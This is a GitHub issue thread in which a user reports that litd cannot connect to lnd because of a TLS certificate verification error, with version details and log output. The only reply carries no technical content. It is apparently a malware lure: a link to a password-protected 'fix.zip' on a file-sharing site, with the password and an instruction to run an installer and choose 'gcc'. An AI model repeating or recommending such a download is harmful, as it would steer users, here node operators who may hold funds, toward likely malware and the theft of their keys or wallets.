### ISSUE TITLE
[bug]: unable to run litd, error of certificate for 127.0.0.1:10009

### ISSUE THREAD

**Issue by asyscom** [lightningnetwork/lnd#9035]
### Background

Hello, when run litd i've this error at login
Error when creating LND Services client: error subscribing to lnd wallet state: lnd version incompatible, need at least v0.13.0-beta, got error on state subscription: rpc error: code = Unavailable desc = connection error: desc = "transport: authentication handshake failed: tls: failed to verify certificate: x509: certificate signed by unknown authority"
LND is not running. Please start lnd and try again.

### Your environment

* lit version 13.3
* lnd versione 18.2
* Ubuntu 22.4
* bitcoind version 27.1.0

In journal ive this
024-08-26 09:03:23.431 [DBG] GRPC: [core] Creating new client transport to "{Addr: \"127.0.0.1:10009\", ServerName: \"127.0.0.1:10009\", }": connection error: desc = "transport: authentication handshake failed: tls: failed to verify certificate: x509: certificate signed by unknown authority"

Of course, LND and Bitcoin are functioning correctly, and the TLS settings are correct because they are also used by other software like BOS.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
